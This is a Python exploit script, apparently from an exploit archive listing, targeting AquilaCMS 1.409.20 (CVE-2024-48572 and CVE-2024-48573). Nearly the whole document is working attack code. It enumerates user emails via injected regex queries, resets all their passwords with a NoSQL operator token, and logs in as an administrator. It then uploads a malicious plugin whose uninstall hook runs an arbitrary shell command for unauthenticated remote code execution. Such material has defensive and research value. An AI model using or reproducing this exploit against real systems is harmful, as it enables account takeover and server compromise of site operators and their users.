Share
## https://sploitus.com/exploit?id=PACKETSTORM:190412
# Exploit Title: AquilaCMS 1.409.20 - Remote Command Execution (RCE) (Unauthenticated)
    # Date: 2024-10-25
    # Exploit Author: Eui Chul Chung
    # Vendor Homepage: https://www.aquila-cms.com/
    # Software Link: https://github.com/AquilaCMS/AquilaCMS
    # Version: v1.409.20
    # CVE: CVE-2024-48572, CVE-2024-48573
    
    
    import io
    import json
    import uuid
    import string
    import zipfile
    import argparse
    import requests
    import textwrap
    
    
    def unescape_special_characters(email):
        return (
            email.replace("[$]", "$")
            .replace("[*]", "*")
            .replace("[+]", "+")
            .replace("[-]", "-")
            .replace("[.]", ".")
            .replace("[?]", "?")
            .replace(r"[\^]", "^")
            .replace("[|]", "|")
        )
    
    
    def get_user_emails():
        valid_characters = list(
            string.ascii_lowercase + string.digits + "!#%&'/=@_`{}~"
        ) + ["[$]", "[*]", "[+]", "[-]", "[.]", "[?]", r"[\^]", "[|]"]
    
        emails_found = []
    
        next_emails = ["^"]
        while next_emails:
            prev_emails = next_emails
            next_emails = []
    
            for email in prev_emails:
                found = False
                for ch in valid_characters:
                    data = {"email": f"{email + ch}.*"}
                    res = requests.put(f"{args.url}/api/v2/user", json=data)
    
                    if json.loads(res.text)["code"] == "UserAlreadyExist":
                        next_emails.append(email + ch)
                        found = True
    
                if not found:
                    emails_found.append(email[1:])
                    print(f"[+] {unescape_special_characters(email[1:])}")
    
        return emails_found
    
    
    def reset_password(email):
        data = {"email": email}
        requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)
    
        data = {"token": {"$ne": None}, "password": args.password}
        requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)
    
        print(f"[+] {unescape_special_characters(email)} : {args.password}")
    
    
    def get_admin_auth_token(emails):
        for email in emails:
            data = {"username": email, "password": args.password}
            res = requests.post(f"{args.url}/api/v2/auth/login/admin", json=data)
    
            if res.status_code == 200:
                print(f"[+] Administrator account : {unescape_special_characters(email)}")
                return json.loads(res.text)["data"]
    
        return None
    
    
    def create_plugin(plugin_name):
        payload = textwrap.dedent(
            f"""
        const {{ exec }} = require("child_process");
    
        /**
         * This function is called when the plugin is desactivated or when we delete it
         */
        module.exports = async function (resolve, reject) {{
          try {{
            exec("{args.command}");
            return resolve();
          }} catch (error) {{}}
        }};
        """
        ).strip()
    
        plugin = io.BytesIO()
        with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file:
            zip_file.writestr(
                f"{plugin_name}/package.json",
                io.BytesIO(f'{{ "name": "{plugin_name}" }}'.encode()).getvalue(),
            )
            zip_file.writestr(
                f"{plugin_name}/info.json", io.BytesIO(b'{ "info": {} }').getvalue()
            )
            zip_file.writestr(
                f"{plugin_name}/uninit.js", io.BytesIO(payload.encode()).getvalue()
            )
    
        plugin.seek(0)
        return plugin
    
    
    def rce(emails):
        auth_token = get_admin_auth_token(emails)
        if auth_token is None:
            print("[-] Administrator account not found")
            return
    
        print("[+] Create malicious plugin")
        plugin_name = uuid.uuid4().hex
        plugin = create_plugin(plugin_name)
    
        print("[+] Upload plugin")
        headers = {"Authorization": auth_token}
        files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")}
        requests.post(f"{args.url}/api/v2/modules/upload", headers=headers, files=files)
    
        print("[+] Find uploaded plugin")
        headers = {"Authorization": auth_token}
        data = {"PostBody": {"limit": 0}}
        res = requests.post(f"{args.url}/api/v2/modules", headers=headers, json=data)
    
        plugin_id = None
        for data in json.loads(res.text)["datas"]:
            if data["name"] == plugin_name:
                plugin_id = data["_id"]
                print(f"[+] Plugin ID : {plugin_id}")
                break
    
        if plugin_id is None:
            print("[-] Plugin not found")
            return
    
        print("[+] Deactivate plugin")
        headers = {"Authorization": auth_token}
        data = {"idModule": plugin_id, "active": False}
        res = requests.post(f"{args.url}/api/v2/modules/toggle", headers=headers, json=data)
    
        if res.status_code == 200:
            print("[+] Command execution succeeded")
        else:
            print("[-] Command execution failed")
    
    
    def main():
        print("[*] Retrieve email addresses")
        emails = get_user_emails()
    
        print("\n[*] Reset password")
        for email in emails:
            reset_password(email)
    
        print("\n[*] Perform remote code execution")
        rce(emails)
    
    
    if __name__ == "__main__":
        parser = argparse.ArgumentParser()
        parser.add_argument(
            "-u",
            dest="url",
            help="Site URL (e.g. www.aquila-cms.com)",
            type=str,
            required=True,
        )
        parser.add_argument(
            "-p",
            dest="password",
            help="Password to use for password reset (e.g. HaXX0r3d!)",
            type=str,
            default="HaXX0r3d!",
        )
        parser.add_argument(
            "-c",
            dest="command",
            help="Command to execute (e.g. touch /tmp/pwned)",
            type=str,
            default="touch /tmp/pwned",
        )
        args = parser.parse_args()
    
        main()